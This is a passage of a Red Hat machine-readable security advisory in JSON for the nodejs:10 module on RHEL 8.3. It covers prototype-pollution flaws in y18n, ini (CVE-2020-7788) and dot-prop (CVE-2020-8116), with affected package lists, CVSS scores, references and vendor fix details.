"AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-docs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-nodemon-0:1.18.3-1.module+el8+2632+6c5111ed.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-nodemon-0:1.18.3-1.module+el8+2632+6c5111ed.src", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-packaging-0:17-3.module+el8+2873+aa7dfd9a.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-packaging-0:17-3.module+el8+2873+aa7dfd9a.src", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.x86_64" ] } ], "threats": [ { "category": "impact", "details": "Low" } ], "title": "nodejs-y18n: prototype pollution vulnerability" }, { "cve": "CVE-2020-7788", "cwe": { "id": "CWE-400", "name": "Uncontrolled Resource Consumption" }, "discovery_date": "2020-12-11T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1907444" } ], "notes": [ { "category": "description", "text": "A flaw was found in nodejs-ini. If an attacker submits a malicious INI file to an application that parses it with ini.parse, they will pollute the prototype on the application. This can be exploited further depending on the context.", "title": "Vulnerability description" }, { "category": "summary", "text": "nodejs-ini: Prototype pollution via malicious INI file", "title": "Vulnerability summary" }, { "category": "other", "text": "Node.JS packages in Red Hat Enterprise Linux and Red Hat Software Collections included the vulnerable dependency packaged in \"nodejs-npm\" component. Processing malicious files using npm could potentially trigger this vulnerability. The \"ini\" package bundled with npm was not in the library path where it could be included directly in other programs.\n\nThe nodejs-nodemon packages in Red Hat Enterprise Linux and Red Hat Software Collections are affected by this vulnerability as they bundle the nodejs-ini library. Usage of that library is governed by nodemon itself, so applications started by nodemon are not impacted. Further, nodemon is a developer tool not intended to be used in production.\n\nThe ini package is included in Red Hat Quay by protractor and webpack-cli, both of which are dev dependencies.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.src", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-docs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-nodemon-0:1.18.3-1.module+el8+2632+6c5111ed.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-nodemon-0:1.18.3-1.module+el8+2632+6c5111ed.src", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-packaging-0:17-3.module+el8+2873+aa7dfd9a.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-packaging-0:17-3.module+el8+2873+aa7dfd9a.src", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.x86_64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2020-7788" }, { "category": "external", "summary": "RHBZ#1907444", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1907444" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2020-7788", "url": "https://www.cve.org/CVERecord?id=CVE-2020-7788" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-7788", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-7788" } ], "release_date": "2020-12-08T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-02-16T14:25:46+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.src", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-docs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-nodemon-0:1.18.3-1.module+el8+2632+6c5111ed.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-nodemon-0:1.18.3-1.module+el8+2632+6c5111ed.src", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-packaging-0:17-3.module+el8+2873+aa7dfd9a.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-packaging-0:17-3.module+el8+2873+aa7dfd9a.src", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.x86_64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:0548" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 7.3, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "products": [ "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.src", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-docs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-nodemon-0:1.18.3-1.module+el8+2632+6c5111ed.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-nodemon-0:1.18.3-1.module+el8+2632+6c5111ed.src", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-packaging-0:17-3.module+el8+2873+aa7dfd9a.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-packaging-0:17-3.module+el8+2873+aa7dfd9a.src", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.x86_64" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "nodejs-ini: Prototype pollution via malicious INI file" }, { "cve": "CVE-2020-8116", "cwe": { "id": "CWE-471", "name": "Modification of Assumed-Immutable Data (MAID)" }, "discovery_date": "2020-08-12T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1868196" } ], "notes": [ { "category": "description", "text": "A prototype pollution flaw was found in nodejs-dot-prop. The function set could be tricked into adding or modifying properties of Object.prototype using any of the constructor, prototype, or _proto_ paths. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.", "title": "Vulnerability description" }, { "category": "summary", "text": "nodejs-dot-prop: prototype pollution", "title": "Vulnerability summary" }, { "category": "other", "text": "In both OpenShift Container Platform (OCP) and OpenShift ServiceMesh (OSSM), the grafana and prometheus containers are behind OpenShift OAuth restricting access to the vulnerable dot-prop library to authenticated users only, therefore the impact is Low.\n\nRed Hat Openshift Container Storage 4 is not affected by this vulnerability, as it already includes patched version of dot-prop(v5.2.0) in noobaa-core container.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.src", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-docs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-nodemon-0:1.18.3-1.module+el8+2632+6c5111ed.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-nodemon-0:1.18.3-1.module+el8+2632+6c5111ed.src", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-packaging-0:17-3.module+el8+2873+aa7dfd9a.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-packaging-0:17-3.module+el8+2873+aa7dfd9a.src", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.x86_64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2020-8116" }, { "category": "external", "summary": "RHBZ#1868196", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1868196" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2020-8116", "url": "https://www.cve.org/CVERecord?id=CVE-2020-8116" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-8116", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-8116" }, { "category": "external", "summary": "https://hackerone.com/reports/719856", "url": "https://hackerone.com/reports/719856" } ], "release_date": "2020-01-28T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-02-16T14:25:46+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.src", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", 